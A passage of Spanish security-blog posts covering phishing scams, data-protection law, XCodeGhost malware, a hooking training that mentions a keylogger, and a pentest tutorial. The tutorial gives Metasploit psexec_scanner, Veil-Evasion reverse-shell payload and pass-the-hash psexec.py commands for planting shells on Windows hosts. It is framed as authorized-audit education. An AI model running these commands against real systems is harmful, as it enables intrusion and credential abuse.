Ni que decir tiene que si por alguna razón necesitáramos volver a arrancar el servidor, podríamos hacerlo desde cualquier equipo con acceso al servidor.

La entrada Cifrando el servidor en seis pasos aparece primero en Security Art Work.

En este caso el dicho popular “segundas partes nunca fueron buenas” no se cumplió. Repitiendo el éxito del año pasado la organización de la rooted trajo a tierras valencianas un buen elenco de profesionales de la seguridad para presentar sus últimos trabajos. Como en años anteriores, S2 Grupo ha participado como espónsor del congreso, mostrando así nuestro compromiso con la seguridad.

Esta vez tuvimos la oportunidad de participar en uno de los trainings impartidos por Pablo San Emeterio de Telefónica, entorno al mundo del hooking. En primer lugar y antes de comentar los aspectos más relevantes del lab, destacar la profesionalidad, cercanía y humildad (sí humildad, ese concepto tan extraño de encontrar dentro del security world…) de Pablo.

El training, es altamente recomendable para los que como yo, habíamos oído del tema pero nunca nos habíamos puesto con las manos en la masa, así como para los que tengan adquiridos conceptos básicos de hooking y quieran ampliarlos/reforzarlos o simplemente amueblar ordenadamente lo aprendido de forma autodidacta.

A grandes rasgos, la estructura general del lab está dividida en técnicas de: hooking en Linux, Windows user space y Windows Kernelland, con algunos toques de hooking de red mediante netfilter y parcheo de binarios.

Comenzamos la jornada implementando técnicas de hooking en Linux mediante LD_PRELOAD, lo cual nos permitió como ejemplo práctico controlar las llamadas a read y write de Openssl y de esta manera inspeccionar todo el tráfico cifrado en una comunicación mediante https.

Gratamente sorprendidos por las grandes posibilidades de estas técnicas (solo hay que dejar volar la imaginación e identificar alguna librerías interesantes…), pasamos a trabajar sobre la gestión y modificación de paquetes de red mediante Netfilter. Haciendo uso de sus librerías y de Scapy fuimos capaces de manipular los paquetes de red a nuestro antojo, en una conexión inline.

Abandonando el mundo de Linux y con grandes expectativas de llegar a la parte de Hooking Windows, el training continuó su jornada dentro del espacio de usuario o userland. Ansiosos de descubrir cómo ponernos en medio de una llamada a una función, procedimos a desarrollar un pequeño keylogger capaz de inyectarse como DLL en todos los procesos del sistema. Para ello hookeamos los mensajes de ventana de los procesos con esta característica identificando todos aquellos que presentaban un evento de tipo WM_KEYDOWN, esto nos permitió guardar en un archivo todo lo que el usuario tecleaba sobre las aplicaciones de escritorio.

Por último y entrando ya en el mundo de las sombras, Pablo dio un repaso de las técnicas de hooking a nivel de kernel, mundo en el que hay que ser bastante valiente y osado para adentrarse. En resumen lab altamente recomendable. Si en próximas ediciones estáis pensando en apuntaros a algún training de rooted, este no os defraudará.

La entrada RootedCON Valencia Labs aparece primero en Security Art Work.

Hace un par de semanas recibí un WhatsApp de un contacto del que hacía tiempo que no sabía nada. Me enviaba un enlace a seguir y a continuación una frase en la que hacía referencia a un vale descuento para Mercadona. Alguien con quien apenas tengo contacto, ¿me regala un vale descuento?… Llámame desconfiada, pero aunque ese mensaje lo hubiera enviado el mismísimo Juan Roig, habría desconfiado igualmente.

Hoy en día estamos más que acostumbrados a escuchar o leer noticias de este tipo, relacionadas con nuevos fraudes online. Sin embargo, todavía seguimos cayendo.

Es importante saber reconocer este tipo de fraudes que bien nos pueden llegar por email, WhatsApp, SMS, redes sociales… ¿Cómo? La mayor parte de estos mensajes contienen enlaces o teléfonos que, utilizando una falsa identidad de cualquier empresa conocida, llevan al descuento o regalo prometido. En realidad se trata de un enlace falso que solicitará tus datos personales o descargará cualquier tipo de malware sin que tú te enteres prácticamente. Si seguimos el enlace y rellenamos toda la información que solicitan estaremos facilitando toda nuestra información a los ciberdelincuentes que se encuentran detrás de todo esto. Una vez tengan estos datos, podrán hacer lo que quieran con ellos (y te aseguro que nada bueno), desde suscribirte, sin que tú lo sepas, a programas de SMS Premium (lo que viene suponiendo un aumento del número de dígitos en tu factura de teléfono a final de mes) hasta suplantar tu propia identidad o robar tus datos bancarios.

Esta es una escueta recopilación de distintos fraudes online, en los que se pueden ver los diferentes tipos de engaño que se suelen utilizar. Apuesto a que has oído hablar de ellos o, incluso, has recibido alguno:

1. Vale descuento de 150€ de Mercadona. Dado que es el vale que he recibido, merece encabezar la lista. Aunque Mercadona ya había sido víctima de este tipo de fraudes anteriormente vía email, hace poco más de un mes, apareció un nuevo engaño, esta vez por WhatsApp y ofreciendo un descuento mayor. Para “conseguirlo” tan solo tenías que rellenar una encuesta de 4 preguntas y compartirlo con otros 10 contactos. Resultado: no recibías el susodicho descuento y tus datos quedaban en manos de los ciberdelincuentes.
2. Vale de regalo de 500€ de Lidl. Este mismo verano, tan sólo una semana más tarde de la publicación del vale de Mercadona apareció otro nuevo “regalo”. Esta vez le tocó a Lidl y ofreciendo nada más y nada menos que ¡500 pavos! Aunque en el mensaje no aparecía por ningún lado la imagen de Lidl, para obtener el vale era necesario rellenar una encuesta y facilitar tus datos personales. Tras rellenarla entrabas en un sorteo y recibías un email en el que te invitaban a formar parte de la comunidad de la empresa (supuestamente Lidl…).
3. Vale de 500€ de ZARA. ¿Os recuerda a algún otro vale? Sí, en todos los casos se sigue el mismo modus operandi, pero, aun así más de uno sigue cometiendo el mismo error y cayendo en este tipo de estafas. En el caso de ZARA, quienes ya “regalaron” vales de 500€ hace meses, les vuelve a suceder. Y también a finales del mes de agosto (la vuelta de vacaciones puede pillar despistado a más de uno). En este caso bastaba con rellenar una encuesta, compartir con tus contactos de WhatsApp y, otra vez más, facilitar tus datos personales. De este modo entrarías en el sorteo de uno de los 150 vales de descuento disponibles.
4. Cheque regalo de Amazon. En abril comenzaba a difundirse un mensaje de WhatsApp que ofrecía un cheque regalo por parte de Amazon. El mensaje llegaba desde un contacto desconocido y si eras uno de los 18.000 primeros usuarios en acceder al enlace el cheque sería tuyo. En realidad se trataba de un troyano llamado Amazon-Gift que convertía a nuestro teléfono en un zombie recopilando nuestros datos personales.
5. Tropecientos cachorros van a ser sacrificados… Cambiamos de tipo de estafa. Aquí no nos ofrecían cheques de regalo a gastar en ninguna tienda. Aquí tocaban nuestro corazoncito diciéndonos que iban a sacrificar a un número determinado de cachorros en una perrera. ¿Por qué no adoptar? Sencillamente porque en el anuncio aparecía un número de teléfono al que llamar y que, evidentemente, era un fraude. Lo que conseguíamos llamando a dicho teléfono era acabar suscritos en un servicio de SMS Premium que no se traduce en otra cosa que en un aumento de tu factura del móvil cada mes.
6. Cambiar el color de tu Facebook. Este es ya un viejo conocido que, sin embargo, sigue estando a la orden del día. A comienzos de septiembre, una nueva oleada de mensajes enviados a través de las redes sociales indicaban cómo cambiar el color azul de Facebook. Una vez accedías al link proporcionado, tan sólo tenías que compartir 15 veces la publicación. Una vez compartido, descargabas una aplicación que en realidad era una página en la que se solicitaba el número de teléfono. Resultado, tu Facebook seguía azul y tu bolsillo cada mes más vacío por haberte suscrito a un servicio de SMS Premium.
7. Casting de Juego de Tronos. Hace varios meses, aprovechando el tirón de la serie Juego de Tronos y el futuro rodaje de varios capítulos en España, hubo más de un listo que se quiso lucrar de esto. Para ello, se creó una web falsa, www.castingjuegodetronos.com en la que aparecía un teléfono al que llamar para participar en el casting de la famosa serie. Este casting nunca existió, pero todos aquellos que llamaron al teléfono lo pagaron, y literalmente, ya que se trataba de un número con tarificación especial con un coste más que elevado.
8. Llamadas gratuitas de WhatsApp. Antes de que todos tuviéramos esta opción en nuestro WhatsApp muchos se lucraron con este fraude. Tan sólo recibiendo la invitación correspondiente y enviándola a 10 de tus contactos podías tener instalada esta opción en tu WhatsApp. Como no, esta invitación era falsa y a través del enlace obtenido tras compartir, se descargaba un software malicioso en tu dispositivo.
9. WhatsApp Web. Antes de que esta opción de WhatsApp estuviera disponible ya se enviaban correos con el asunto WhatsApp para PC en los cuales aparecía un código QR que si escaneabas instalaba un malware en tu dispositivo. Más recientemente, al poco de que empezara a funcionar de verdad la versión web de WhatsApp, los timos continuaron. A través de webs falsas se realizaban distintos fraudes, desde solicitar un número de teléfono para las dichosas suscripciones Premium hasta la opción de descargar una aplicación que escondía un troyano con el que llegaban a obtener datos bancarios de los usuarios.
10. Terremoto de Nepal. Los ciberdelincuentes aprovechan cualquier catástrofe natural o desastre para hacer negocio. Pasó con el terremoto de Nepal. Aprovechando el espíritu solidario de todo aquel que quería colaborar con las víctimas haciendo su propio donativo, los ciberdelincuentes crearon varias páginas falsas. Desde estas páginas se solicitaba ayuda económica para las víctimas, en algunos casos imponiendo una cantidad “mínima” de 100€, que, obviamente, no iba a parar a las víctimas sino a los bolsillos de los cibercriminales.

Como podéis ver, en todos estos casos, se trata de diferentes técnicas de phishing que aprovechan el desconocimiento y confianza de los usuarios para sacar beneficio de ello.

¿Qué hacer para evitar caer en estos timos? Sobre todo, hay que usar el sentido común. Ten claro que nadie regala duros a cuatro pesetas y si, de verdad, las empresas quieren regalar algo o realizar algún sorteo, lo comunicarán desde sus propias fuentes oficiales. Por eso, desconfía y revisa los emisores de cualquier email que recibas, nunca sigas el enlace que envíen ni descargues adjuntos y ni mucho menos, compartas o publiques tus datos personales.

Fuentes

• www.osi.es
• www.computerhoy.com

La entrada Estafas de hoy en día aparece primero en Security Art Work.

En este post vamos a ver dos maneras de droppear shells en equipos Windows, no voy a entrar en detalles de cómo llegar a comprometer un equipo, asumo que ya está hecho y que habéis volcado los hashes o credenciales en texto plano utilizando Mimikatz o alguna herramienta similar.

La primera de ellas será utilizando Metasploit y psexec_scanner,un grandioso módulo de Darkoperator, la segunda mediante psexec.py de IMPACKET.

En primer lugar, bajaremos el módulo psexec_scanner de Github, lo dejaremos en nuestra carpeta de modules, en mi caso he optado por dejarlo en /uxiliary/scanner/smb/psexec_scanner.rb.

Una vez dejamos el módulo en la carpeta, abrimos nuestro msfconsole y cargamos el modulo (use /uxiliary/scanner/smb/psexec_scanner), configuramos la opciones (LHOST, LPORT, PAYLOAD, RHOSTS, etc..). Antes de hacer nada más, quiero destacar que al contrario que los módulos que vienen en Metasplot de psexec:

• exploit/windows/smb/psexec
• exploit/windows/smb/psexec_psh

Este módulo permite utilizar múltiples RHOST, por lo que le podemos pasar un /24. Lo que significa que “is going to rain shells”.

Ahora imaginad que os hacéis con un controlador de dominio durante una auditoria y queréis desplegar el agente de OpenDLP, it’s time to sit back and relax.

Ilustración 1: Show options psexec_scanner

Bueno antes que nada vamos a levantar nuestro listener (exploit/multi/handler), también decir que el módulo ya te levanta un listener automáticamente, pero por la costumbre de tenerlo en otro tab lo he deshabilitado (set HANDLER false).

Cuando configuramos nuestro listener es importante habilitar la opción de (set exitOnSession false) para que lo deje en el background y no pare el listener al recibir la primera conexión.

Ilustración 2: Metasploit multi/hanlder

Con todo ya en marcha, volvemos al psexec_scanner y lo ejecutamos.

Ilustración 3: Run psexec_scanner

En nuestro caso solo teníamos un equipo, en el segmento de red (X.X.X.X/24).

En la siguiente imagen, podemos ver que todo ha salido a la perfección y tenemos nuestra sesión de Metaploit lista para el -i.

Ilustración 4: Sesión Metasploit

Porque sabemos que a veces las cosas no funcionan, vamos a pasar a usar nuestro segundo método. Aunque éste no tiene la opción de múltiples host, es igual o más eficaz que el anterior.

Los desarrolladores de IMPACKETnos han dejado con una maravillosa biblioteca en Python que incluye un módulo de psexec (psexec.py), esto nos permitirá abrir una cmd en el equipo remoto. Además de esto, también viene con funcionalidades adicionales, como la de subir archivos a través del método PUT de SMB.

Podéis descargar IMPACKET desde este enlace en Github.

Vamos a usar la funcionalidad de subir archivos mediante psexec.py para subir un paylaod/meterpreter que vamos a crear con Veil-Evasion.

Para ello ejecutamos nuestro Veil-Evasion y configuramos nuestras opciones (PAYLOAD, LHOST, LPORT). En mi caso estoy usando el paylaod 5 (use 5) c/meterpreter/rev_tcp, una vez tenemos todo configurado ejecutamos la opción generate para que nos compile el .exe.

Ilustración 5: Payload compilado

Con nuestro paylaod recién sacado de horno, nos vamos a la carpeta donde lo hemos generado (cd /usr/share/veil-output/compiled/). En este punto, ya podemos ejecutar psexec.py, para ello tenemos la opción de utilizar hashes o bien credenciales en claro.

Hashes
[-hashes LMHASH:NTHASH usuario@ip comando]: psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e7266baa0b2c803c3e4e9c70ff50041f administrador@X.X.X.X cmd.exe

Credenciales en claro
[usuario:contraseña@ip comando]: psexec.py administrador:metasploit@X.X.X.X cmd.exe

Como podemos ver en la siguiente imagen nos ha abierto una cmd.

Ilustración 6: Psexec.py

Una vez aquí podemos utilizar el comando PUT para subir para el paylaod que generamos anteriormente con el Veil-Evasion.

Para subir el paylaod ejecutamos el siguiente comando: put SecurityArtwork.exe

Para ejecutarlo: start C:\Windows\SecurityArtwork.exe

Una vez en este punto, si lo hemos hecho todo bien deberíamos tener una sesión de Metasploit abierta como podemos ver en la siguiente imagen.

Ilustración 7: Sesión psexec.py

Por último, siempre que utilizamos el comando PUT, una vez cerréis la sesión de Metasploit acordaros de borrar el archivo del /f C:\Windows\SecurityArtwork.exe.

Espero os sirva para pwnear :D equipos a los cuales estéis autorizados.

La entrada How to drop Shells in Windows aparece primero en Security Art Work.

En el mes de mayo se llevó a cabo el Tercer Congreso Internacional de Protección de Datos, donde la Súper Intendencia de Industria y Comercio (SIC) realizó el lanzamiento de la Guía para la implementación del Principio de Responsabilidad Demostrada (Accountability).

Como ya sabemos, la reglamentación de la Ley de Protección de Datos en Colombia ha sido un poco ambigua porque da pinceladas de todo, pero sin concluir ninguno de los temas. De este modo, la llegada de la Guía permitió dar un nuevo rumbo ya que estructuró corporativamente la protección de datos personales.

¿Qué contiene la guía?

La Guía está compuesta por tres capítulos que nos permitirán garantizar la implementación del programa integral de gestión de datos personales aunque para este post dejaremos fuera el ítem de consideraciones preliminares dado que éste corresponde a información general de la guía.

A continuación les contaremos de cada uno de ellos.

Capítulo III Fundamentos básicos – desarrollo de un programa integral de gestión de datos personales

Ítems de Compromiso de la Organización

La alta dirección debe apoyar la implementación del programa integral de gestión de datos personales, mediante los recursos económicos y de personal capacitado. A su vez, debe implementar una cultura para la protección de datos personales permitiendo así concienciar a todos los empleados.Para cumplir este objetivo se deben realizar los siguientes pasos:

• Designar a la persona o el área que asuma la función de protección de datos dentro de la organización
• Aprobar y monitorizar el programa integral de gestión de datos personales
• Informar de manera periódica a los órganos directivos sobre su ejecución.

Si la tarea de protección de datos personales corresponde a un área, se deberá designar una persona de dicha área como oficial de protección de datos, para que asuma dicho cargo. Si no es así la responsabilidad de elegir el oficial recaerá en el responsable del tratamiento y el encargado del tratamiento de los datos.
Esta figura será la encargada de velar por implementación de las políticas, procedimientos y buenas prácticas de gestión de datos personales y a su vez será quien estructurará, diseñará y administrará el programa.

Es necesaria la presentación de informes para evidenciar que los controles adjudicados en pro de la seguridad de los datos personales son los más adecuados, se debe implementar un plan de auditoria interna.

Ítems de Controles del Programa

Es necesaria la implantación de procedimientos operacionales, es decir, procedimientos y políticas para la protección de los datos, como por ejemplo:

• Realizar un análisis de riesgos de acuerdo al tratamiento de la información personal dentro de las actividades de gestión operacional.
• Llevar a cabo un inventario de las bases de datos con información personal y a su vez clasificar la información recopilada, como por ejemplo: confidencial, sensible, pública, etc.
• Luego de que se establezca dicho inventario las bases de datos deben estar registradas en el Registro nacional de bases de datos (RNBD).
• Políticas: debemos establecer políticas para los titulares y para la empresa donde se indiquen los principios que rigen el tratamiento de los datos, procedimientos para la recolección o recopilación, mantenimiento, uso y eliminación o disposición final. Las anteriores permiten generar conciencia corporativa.
• Sistema de administración de los riesgos asociados al tratamiento de datos personales: algo que no teníamos en la Ley 1581 y el Decreto 1377 y en realidad un poco olvidado, el análisis de riesgos que se encuentran asociados al tratamiento de datos personales.
• Requisitos de formación y educación: es necesario implementar un plan de capacitación en la empresa para que cubran los usuarios internos, externos y terceros.
• Protocolos de respuesta de violación y manejo de incidentes: es necesario que contemos con un procedimiento para el manejo de incidentes o posibles vulneraciones a los sistemas de información y si nuestra empresa ya ha implementado el SGSI ya está adelantado y solo haría falta el informe y reportar el incidente al titular(es) y notificar a la SIC.
  Gestión de los encargados del tratamiento en las transmisiones internacionales de datos personales. Si la transferencia de los datos se realizara a terceros y éstos son internacionales debemos garantizar la seguridad de la información, partiendo de la confidencialidad, integridad y disponibilidad y a su vez es necesario que se alineen a los requisitos mínimos del programa integral de gestión de datos personales que se encuentra implementados en la empresa que solicito los datos personales.
• Comunicación externa: mediante éste tipo de comunicaciones nos permitirá indicarle al titular sus derechos.

Capítulo IV Evaluación y revisión continúa

Y ya para finalizar la guía nos trae dos ítems que nos permitirán velar por el cumplimiento del programa, los cuales son:

• Desarrollar un plan de supervisión y revisión
• Evaluar y revisar los controles del programa

Capítulo V Demostración del cumplimiento

Ésta es la recta final de todo nuestro trabajo realizado donde demostraremos a la SIC el cumplimiento del programa integral de gestión de datos personales.
Y con esta información que espero les haya sido de mucha ayuda estamos listos para iniciar las labores para implementar nuestro programa integral de gestión de datos personales.

La entrada ¿Y ahora qué nos depara la protección de datos en Colombia? aparece primero en Security Art Work.

Se acabaron las vacaciones, vuelven los madrugones, las interminables jornadas laborales, los atascos, pero no somos los únicos a los que se les acaban las vacaciones; a los niños también se les termina el chollo y han de volver a los colegios y a las guarderías. A más de uno, esto último será la única parte positiva de la vuelta de vacaciones.

En mi caso, mi “enano” vuelve a la guardería, y este año han decidido “modernizarse” y adaptarse más si cabe a lo que la tecnología les ofrece. Este año ya no habrá agenda en papel; en su lugar utilizaremos una agenda digital. Una aplicación que descargas en tu Smartphone con toda la información de tu hijo y donde diariamente te informan de su actividad en la guardería. Si ha comido bien, cuánto ha comido, cuánto ha dormido, etc.

– ¡Qué bien! (Pensé en un primer momento).

Pero conforme la directora nos iba explicando a los padres las grandes ventajas de su uso, y la información que podríamos transmitirnos a través de la aplicación, a mí me fue cambiando poco a poco la cara; y mi mujer, que me conoce como si de mi madre se tratara, se giró y me dijo:

– Ya te has descargado la aplicación, ¿no?
– Hace minuto y medio. Le respondí.

Antes de que terminaran de explicarnos cómo funcionaba, yo ya la tenía en mi dispositivo para ver si podía trastear un poco con ella. Como necesitaba un usuario y una contraseña para poder acceder a la aplicación, entré en la página web de la aplicación, desde donde también se puede acceder a la agenda digital, para ver si decía algo acerca de su seguridad.

¡Y vaya que si ponía algo! Había un gran dibujo de un candado y debajo ponía lo siguiente:

“ES SEGURA. [Nombre de la aplicación] está certificada por cumplimiento estricto con 
la LOPD nivel 3 de seguridad, el máximo exigido para este ámbito.”

¡Toma ya! Certificado LOPD nivel 3 de seguridad. ¿Y por qué no un nivel 5, o un nivel 10 que queda más chulo? Vale que hace poco que he vuelto de mis vacaciones, pero yo juraría que la LOPD no se certificaba, y que no hay un nivel 3 de seguridad, sino medidas de seguridad de nivel bajo, medio y alto. Pero vete tú a saber, que con tanto cambio de gobierno, igual han modificado la ley o el Real Decreto y yo no me he enterado.

Pero no, después de preguntar si había entrado en vigor una nueva ley de protección de datos, o un nuevo Real Decreto, y confirmar que todo seguía igual (prefiero no comentar la cara que pusieron mis compañeros ante esa pregunta, y tampoco quiero saber lo que pensarían de mí en ese momento), pensé que quizá esa aplicación no era tan segura como ellos mismos publicitan.

Visité el aviso legal de su página web para ver qué decía, y lo primero que me llamó la atención fue lo que ponía en el primer párrafo:

“[EMPRESA X] le informa que los datos personales que nos pueda facilitar a través de 
MAIL O FORMULARIO DE CONTACTO, no serán incorporados a los ficheros registrados 
en la Agencia de Protección de Datos de Carácter Personal”.

Y, entonces, ¿qué hacen con ellos? Porque los datos ya los tienen y los han recabado. ¿Los tiran, les prenden fuego? Además, si seguías leyendo el aviso legal, tres párrafos más abajo indicaban lo siguiente:

“[EMPRESA X] solicita, recaba o, simplemente, almacena una serie de datos e 
informaciones que el Usuario introduce en la Web o la Aplicación [Nombre de la 
aplicación] a través de cualquier formulario electrónico u hoja de captación ya sea 
durante el proceso de registro del Usuario en la Web o durante el uso diario de 
[Nombre de la aplicación]. Durante la navegación en la Web, “[EMPRESA X] también 
puede recabar y almacenar información de su dispositivo.”

Pero vamos a ver, ¿en qué quedamos? ¿Sí o no? ¿Y los datos de la aplicación, dónde los meten? Esto no tenía sentido…

Navegué un poco más por la página web y me descargué un manual de uso de la aplicación, a ver si podía esclarecer un poco todo esto, y efectivamente lo hizo. Nada más abrir el documento me encontré con esto:

Datos de salud; la aplicación almacena información de salud de los peques, o lo que es lo mismo, esta herramienta debe de tener aplicadas las medidas de seguridad de nivel alto descritas en el Real Decreto de la LOPD. Recordemos que cuando se tratan datos de nivel alto, como son datos de ideología, afiliación sindical, religión, creencias, origen racial, salud o vida sexual, se han de aplicar además de las medidas de seguridad de nivel básico y medio, las medidas de seguridad de nivel alto. Estas son:

• Gestión y distribución de soportes (artículo 101): Sistema de etiquetado confidencial. Cifrado de datos en la distribución de soportes. Cifrado de información en dispositivos portátiles fuera de las instalaciones (evitar el uso de dispositivos que no permitan cifrado, o adoptar medidas alternativas).
• Copias de respaldo y recuperación (artículo 102): Copia de respaldo y procedimientos de recuperación en lugar diferente del que se encuentren los equipos.
• Registro de accesos (artículo 103): Usuario, hora, fichero, tipo de acceso, autorizado o denegado. Revisión mensual del registro por el responsable de seguridad. Conservación 2 años.
• Telecomunicaciones (artículo 104): Transmisión de datos a través de redes electrónicas cifradas.

Bueno, ya sabemos que la aplicación debe de cumplir estas medidas de seguridad, pero la única que podía verificar en un principio y sin entrar mucho en harina, era a través de la última: Telecomunicaciones.

Solicité el usuario y la contraseña a la directora y accedí a la agenda a través de la página web. ¡Voilà!

Como era de esperar la página no tenía un certificado digital, por lo que los datos no viajan a través de un canal cifrado. ¡La primera en la frente! Bueno y ahora ¿qué? ¿Cómo es posible que la guardería, que “en teoría” están siempre haciéndonos firmar papeles por temas de la LOPD, haya contratado una aplicación que no cumple con ella?

ACTUALIZACIÓN: Tras un correo remitido a la dirección del centro explicando el incumplimiento del artículo 104 del RDLOPD, hemos podido verificar que se ha instalado un certificado digital en la aplicación que da conformidad a dicho artículo.

Debemos tener presente que, si hay algún problema con los datos, el responsable es la guardería, que es el responsable del fichero; la empresa propiedad de la aplicación es el encargado de tratamiento y como tal debe comprometerse a cumplir con las medidas de seguridad. Esto debe quedar reflejado a través de un contrato de acceso a datos por cuenta de terceros entre ambas partes, tal y como indica el artículo 12 de la LOPD. En dicho artículo establece entre otras cosas:

“En el contrato se estipularán, asimismo, las medidas de seguridad a que se refiere el 
artículo 9 de esta Ley que el encargado de tratamiento está obligado a implementar”.

¿En dicho contrato establecerá qué medidas de seguridad ha de aplicar el encargado de tratamiento? Ni idea, pero igual pone que implementan las medidas de seguridad de nivel 7… visto lo visto, no me extrañaría nada.

En fin, creo que voy a meterme en un berenjenal, pero vamos a seguir rascando un poco a ver si conseguimos sacar algo a la luz. Yo por el momento he pedido que sigan informándome de las andanzas de mi hijo a través de la antigua agenda de papel.

Queridos lectores, os mantendré informados.

La entrada Agendas digitales infantiles aparece primero en Security Art Work.

Enciendo la televisión. Tras una pasada por tele tiendas, debates ideológicos y películas antiguas de canales con poco presupuesto me llaman la atención la gran oferta en series: Reyes y caballeros medievales fantásticos que a todos gustan, un hombre con una espada que tiene nombre de pájaro, una ambientada en un mundo post-apocalíptico infestado por zombis… pero la que más me ha llamado la atención es Mr. Robot, la última serie de ficción sobre ciberseguridad.

Esta entradilla podría haber sido cierta excepto por una cosa, Mr. Robot no está ni disponible en España ni doblada en español por el momento. Y esto se debe a que la serie es bastante reciente, tanto que ha sido estrenada en Estados Unidos a finales de Junio.

Mr. Robot es la historia de Elliot, un ingeniero de ciberseguridad que trabaja para una consultora de día, mientras que de noche imparte justicia desenmascarando, tras el debido ataque de hacking, a aquellos que llevan una doble vida, inmoral o ilegal, en el ciberespacio. Si a esto le sumamos que no tiene un buen carácter y que guarda un CD por cada una de sus víctimas con toda la información obtenida mediante sus ataques dirigidos, los cuales conserva en un archivador que guarda debajo de su sofá… entonces puede que os recuerde a otro personaje con similares hábitos pero con más predilección por la sangre.

Lo que me ha llamado la atención es que por primera vez el experto en tecnología no es un gordo obsesionado por la pornografía, sino un yonki adicto a la morfina esnifada, lo cual le hace hablar como si acabara de despertarse de la siesta y hace muy difícil su comprensión para los que no somos nativos angloparlantes.

Basta ver los 15 primeros minutos del capítulo piloto para escuchar términos como rootkit, Tor, malware, DDoS y fuerza bruta, entre otros. Y es que en esta serie los hackers parecen hackers, y no estrellas de rock, ni leen pantallas con caracteres verdes venidos de otro planeta. Esto tampoco quiere decir que sea una presentación de la Rooted, nunca deja de ser una serie de ficción donde muchas cosas saltan a la vista por improbables o inciertas, pero por el momento es la serie sobre nuevas tecnologías que está mejor documentada.

La historia, rodeada de tecnología y de los grandes rascacielos de New York, es narrada en todo momento por el protagonista desde su perspectiva del mundo, mezclando realidad y pensamientos, con un ritmo pausado pero entretenido.

Y con estos mimbres echa a andar el episodio piloto y pronto entendemos el origen del título de la serie. Elliot conoce a Mr. Robot (Christian Slater) y si el primero no tiene suficientes problemas, el segundo le va a meter en unos pocos más.

“Y hasta aquí puedo leer”, para evitar destriparos el argumento, eso que los modernos ahora llaman “espoilear”.

Si te gustan las historias de conspiraciones, eres amante de la tecnología, estás interesado enla ciberseguridad y tienes la suerte de tener una hora de tiempo libre de vez en cuando… Mr. Robot puede ser sin duda tu serie.

¡Disfrútala!

La entrada ¿Conoces a Mr. Robot? aparece primero en Security Art Work.

Quien más, quien menos ha leído acerca de XCodeGhost. Una reciente bomba informativa que se ha vertido a los medios de comunicación como “App Store Hackeada”, dando a entender que el servicio de compra y descarga de aplicaciones había sido hackeado.

Espera, espera, espera…

Lo primero que nos viene a la cabeza es, ¿qué?, ¿cómo? y ¿cuándo? Abres la noticia, te dispones a leer y es cuando lo entiendes todo.

Para los “despistaos”: Se han encontrado aplicaciones en el App Store con código malicioso. Este código ha sido insertado por un malware dentro del IDE XCode para OS X. Así que, “App Store Hackeada”, ¿eh?

Vamos a quitarle un poco de hierro al asunto. Aunque, IMHO, no creo que se pueda considerar como un hackeo a la App Store, pero vamos a tomarlo como tal.

¿Qué ha pasado?

Se publica en el blog de Palo Alto Networks una noticia que daría la vuelta al mundo. En ella dicen que, a través de la red social china llamada Sina Weibo, se hace saber que hay un nuevo malware para OS X e iOS bautizado como XCodeGhost.

Este malware ha sido distribuido en un fichero ejecutable de tipo Mach-O, insertado en diferentes instaladores de XCode y finalmente, éstos instaladores han sido subidos al servicio de descarga Baidu. De esta forma, a aquellos desarrolladores chinos que se descargaran estas versiones de XCode, éste les venía con regalo: XCodeGhost.

¿Cómo funciona?

Grosso modo, después de que se descubriera el malware los investigadores de Palo Alto Networks analizaron el artefacto con más detalle, dejando al descubierto cómo funciona.

• En primer lugar, teniendo el IDE XCode con regalo instalado, el malware inserta código malicioso en el momento que el desarrollador compila su App para iOS.
• El desarrollador subía la app al App Store de Apple y, los mecanismos de seguridad de la compañía de la manzana no detectaban nada sospechoso.
• Publicada la app, los usuarios que descargaran esta versión con código malicioso.
• La app recopila información sobre el dispositivo y datos de configuración como:
  • Timestamp del dispositivo
  • Versión de iOS empleada
  • Tipo de dispositivo
  • Idioma
  • Nombre de la aplicación que ha recopilado la información
  • Red a la que está conectada
  • Etc.

Tal y como se muestra en la siguiente imagen donde se muestra parte del código:

Imagen extraída del blog de Palo Alto

La app cifra y envía la información recogida a sus CnC:

• http://init.crash-analytics[.]com
• http://init.icloud-diagnostics[.]com
• http://init.icloud-analysis[.]com

Por último, y según las investigaciones llevadas a cabo por Palo Alto Networks, la aplicación maliciosa es capaz de realizar ataques de phishing al usuario de iOS, entre otros:

• Secuestrar el navegador para dirigir al usuario a una URL que permita explotar otras vulnerabilidades en iOS o de otras aplicaciones.
• Leer el contenido del portapapeles con el riesgo que conlleva: Si se ha copiado recientemente una contraseña, o información sensible, ésta será enviada al CnC.

Aplicaciones afectadas

Una vez descubierto lo que hace, era necesario identificar qué aplicaciones habían sido afectadas por este malware. La mayoría de ellas, como es de esperar, orientadas a usuarios chinos. Sin embargo, se ha llegado a extender a aplicaciones que utilizan usuarios de todo el mundo. Esto es debido a que las app las desarrollan compañías chinas. Para ver un listado completo de Apps que han sido identificadas hasta el día de hoy podéis acceder a este enlace.

Conclusiones

Para terminar, decir que este tipo de ataques no depende al 100% de la seguridad de Apple. Influye el hecho de que un desarrollador se descargue un entorno de desarrollo que viene con un malware de compilador que permite estos ataques. Éste es uno de los muchos motivos por los que, tal y como venimos diciendo desde hace mucho tiempo, es importante descargar software solo de fuentes fiables. Después ocurren cosas como éstas y nos llevamos las manos a la cabeza leyendo titulares como que la “App Store ha sido hackeada”.

Referencias

• Noticia extraída del blog de Palo Alto Networks

La entrada XCodeGhost: Entre fantasmas aparece primero en Security Art Work.

Dadas las numerosas noticias que han aparecido últimamente sobre fugas de datos, a todos se nos pasan por la cabeza preguntas como “¿Dónde pueden estar nuestros datos?” y “¿Qué pasaría si la organización a la que se los hemos suministrado “voluntariamente” tuviera una brecha de seguridad que pudiera provocar el robo o fuga de los mismos?”.

Buscando información para hacer este post, me he encontrado con esta página que muestra de forma gráfica información sobre las organizaciones que en los últimos años han sufrido una fuga de datos.

En dicha página podemos encontrar desde casos famosos hasta casos desconocidos pero no menos importantes si son nuestros datos los que están en juego. Podemos aplicar diferentes filtros como puede ser el tipo de organización o el motivo que ha provocado la fuga de información. Destaquemos que si bien en la mayoría de los casos las fugas se han producido debido a un ciberataque, el filtro también ofrece otros criterios más llamativos como son: “publicación accidental”, “inside job”, “pérdida o robo de PC”, “pérdida de dispositivos” y “poca seguridad”.

Si pulsamos sobre cada burbuja podemos acceder a más información sobre el caso en cuestión. En algunos casos te conduce a la página donde la organización explica a sus usuarios el hecho sucedido, en otros casos te redirige a una página donde se puede obtener más información sobre la noticia.

Invito a los lectores a visitar dicha página para comprobar si sus datos pudieran estar en alguna de estas burbujas. Entre otras burbujas aparece la de Ebay: en este caso los hackers consiguieron acceder a una base de datos que contenía las contraseñas de los usuarios. Según Ebay las contraseñas estaban cifradas, aun así recomendaban a los usuarios que cambiaran sus contraseñas.

